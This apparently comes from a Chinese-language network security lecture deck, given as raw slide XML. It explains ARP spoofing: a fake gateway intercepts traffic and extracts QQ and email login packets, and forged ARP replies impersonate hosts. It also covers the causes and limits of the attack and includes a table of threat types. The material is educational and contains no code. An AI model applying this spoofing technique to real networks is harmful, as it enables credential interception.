            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假网关（攻击者）分析接收到的数据包，提取有价值数据包（如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>及邮箱登录数据包）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217132" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2123803" y="2421657"/>
            <a:ext cx="1295400" cy="129540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3" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683569" y="4983771"/>
            <a:ext cx="6699942" cy="59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rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假网关再把数据包转发给真正的网关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1C27503C-9669-4E2B-AC65-B26F3136F412}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1572037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7123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217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124"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217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21712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712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17127"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2171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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217127"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21712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17130"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21713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7125"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2171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171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1713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17131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21713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17131"/>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217132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21713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7133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217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24" grpId="0"/>
      <p:bldP spid="217124" grpId="1"/>
      <p:bldP spid="217125" grpId="0"/>
      <p:bldP spid="217125" grpId="1"/>
      <p:bldP spid="217131" grpId="0"/>
      <p:bldP spid="217131" grpId="1"/>
      <p:bldP spid="217133"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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512763" y="1428750"/>
            <a:ext cx="8250237" cy="4743450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>报文假冒其它主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B Reply&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>MACb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>IPc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，此时所有发送到主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的包都被发送到了主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000"/>
              <a:t>假冒攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539"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CDE8C57-AED4-44F8-BA1C-F836391477DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="322562" name="Picture 2" descr="http://f.hiphotos.baidu.com/baike/pic/item/d833c895d143ad4b048964cf82025aafa40f061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676" y="2877010"/>
            <a:ext cx="6264696" cy="399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611648"/>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609" name="Rectangle 257"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="850106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>资源与威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-2289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684" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2697163" y="-2044700"/>
            <a:ext cx="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2356" name="Group 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1979324280"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="755960" y="65520"/>
          <a:ext cx="8064128" cy="6792480"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="432037">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="390494">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1100031">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="666334">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="664671">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="663009">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="661349">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="415420">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="581587">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20008"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="829179">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20009"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="830839">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20010"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="829178">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20011"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="283020">
                <a:tc rowSpan="2" gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="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                                        目标</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="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dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial"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威胁</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bg2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2" hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="2" hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="5">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数据</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100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:ea typeface="宋体" charset="-122"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>应用与设施</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-AU" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Times New Roman" pitchFamily="18"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3020">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帐号</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口令</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组件</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进程</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操作系统</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计算机</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局域网</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广域网</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283020">
                <a:tc rowSpan="22">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动作</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rowSpan="16">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主动</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探测</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扫描</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溢出</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假冒</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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伪装</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旁路控制</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服务欺骗</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授权侵犯</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窃取</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媒体清理</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0"/>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物理侵入</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1"/>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重放</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2"/>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否认</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3"/>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资源耗尽</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4"/>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更改</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5"/>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陷门</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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木马</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6"/>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社交工程</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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="283020">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="6">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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被动</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截获</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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修改</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8"/>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窃听</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9"/>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电磁截获</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20"/>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流量分析</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dirty="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dirty="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21"/>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读取</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22"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="28302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拷贝</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914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="2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a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" charset="0"/>
                        <a:ea typeface="宋体" charset="-122"/>
                        <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"/>
                    </a:p>
                  </a:txBody>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ts val="2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dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Arial" charset="0"/>
                        <a:ea typeface="宋体" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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23"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71937" name="Rectangle 256"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8888413"/>
            <a:ext cx="2381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a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注：√表示该目标可能面临的安全威胁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-AU"/>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19137152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2356"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="612356"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="612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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设计之时没有考虑安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>任何计算机都可以发送虚假的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>无状态性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之间没有关系</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存动态更新</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机无论是否发送过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求，都会在收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应答时刷新自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗问题的原因：</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130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34107503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7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24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32"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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只能被用于局域网（黑客必须已经获得局域网中某台机器的访问权）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74754" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗的局限性</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131</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19859534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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="221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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
